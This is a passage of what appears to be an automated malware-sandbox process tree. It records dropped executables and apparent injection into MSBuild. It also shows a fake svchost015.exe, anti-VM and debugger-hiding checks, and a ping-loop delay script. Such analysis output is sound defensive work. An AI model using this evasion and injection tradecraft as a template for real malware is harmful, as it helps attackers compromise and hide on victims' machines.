PID:8384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494870101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10494870101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8324
-
-
C:\Users\Admin\AppData\Local\Temp\10494880101\9sWdA2p.exe"C:\Users\Admin\AppData\Local\Temp\10494880101\9sWdA2p.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\10494890101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10494890101\larBxd7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9876
-
-
C:\Users\Admin\AppData\Local\Temp\10494900101\DgQBvwg.exe"C:\Users\Admin\AppData\Local\Temp\10494900101\DgQBvwg.exe"6⤵PID:11316
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0m2q1fsv\0m2q1fsv.cmdline"7⤵PID:11880
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87A5.tmp" "c:\Users\Admin\AppData\Local\Temp\0m2q1fsv\CSC70831B897ED4D7199D6380824B3ACD.TMP"8⤵PID:12052
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:12180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:12136
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494910101\31W3sid.exe"C:\Users\Admin\AppData\Local\Temp\10494910101\31W3sid.exe"6⤵PID:8148
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5328
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494920101\04acc64f02.exe"C:\Users\Admin\AppData\Local\Temp\10494920101\04acc64f02.exe"6⤵PID:10744
-
-
C:\Users\Admin\AppData\Local\Temp\10494930101\824c7cfc96.exe"C:\Users\Admin\AppData\Local\Temp\10494930101\824c7cfc96.exe"6⤵PID:5284
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10494930101\824c7cfc96.exe"7⤵PID:13004
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:5028
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:2612
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6252
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe1⤵PID:6696
-
C:\Windows\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe2⤵PID:6756
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:6804
-
C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7124 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i2qngp2s\i2qngp2s.cmdline"3⤵PID:1748
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6F7.tmp" "c:\Users\Admin\AppData\Local\Temp\i2qngp2s\CSC7C4705B153984D1AB693B6B0137C13FF.TMP"4⤵PID:5148
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:4272
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:5256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:5284
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5288
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7556 -ip 75561⤵PID:5340
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{80a6697a-7dc0-420f-a9c6-a7cdfa99c001}\76f59edd-a3bd-47c6-8a0c-ade88a265eeb.cmd"1⤵PID:9372
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5712
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10188
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5680
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10252
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10300
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10388
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10448
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10496
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10544
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10996
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11044
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11096
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11176
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11236
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5756
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11300
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11352
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11404
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11460
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11536
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11588
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11640
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11692
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11736
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11808
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12080
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5964
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6132
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12476
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6336
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6976
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7024
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7076
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7112
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7160
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:3840
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2204
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1784
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5276
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7244
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7740
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7796
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7864
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7972
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5344
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9244
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9324
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9436
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9936
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10056
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10112
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10180
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10296
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10348
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10468
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10608
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10672
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10752
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10824
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10892
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10936
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10992
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11056
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11104
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11140
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11208
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11260
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11288
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11364
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11788
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11844
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11936
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11956
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12016
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12104
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12172
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2444
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6100
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1620
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6876
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2556
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5152
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7172
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:1572
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7392
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7500
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6180
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7532
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7792
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7888
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7336
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8124
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5404
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8284
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8276
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8472
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8584
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8420
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:7604
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5468
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5652
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8896
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8960
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9020
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5448
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8452
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9900
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9932
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9972
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10004
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13284
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9476
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8324
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5716
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10276
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10344
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10396
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10456
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10520
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10580
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11020
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11528
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11556
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11588
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11724
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11784
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5864
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6096
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:4376
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12600
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12708
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11108
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11452
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5896
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:4548
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:860
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6328
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6376
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6436
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6800
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12272
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7060
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:7100
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2748
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:4844
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:3180
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4940
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5276
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7340
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7548
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7616
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7732
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:7808
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7892
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7996
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8104
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8256
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8440
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8696
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8952
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9044
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9172
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5644
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9248
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9332
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9392
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9444
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9544
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9624
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9716
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9792
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9948
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9724
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10268
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10304
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10440
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7460
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10644
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10772
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10916
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10972
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11040
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11120
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11340
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11372
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11680
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7708
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7944
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5548
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5564
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:1476
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8516
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9424
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:5384
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8772
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11780
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8672
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8340
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8724
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11840
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11888
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11600
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11920
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11948
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12056
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6000
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9876
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4612
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12304
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12480
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12632
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:13016
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:13056
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12968
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:1628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13124
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13272
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13268
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6228
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:4212
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2508
-
-
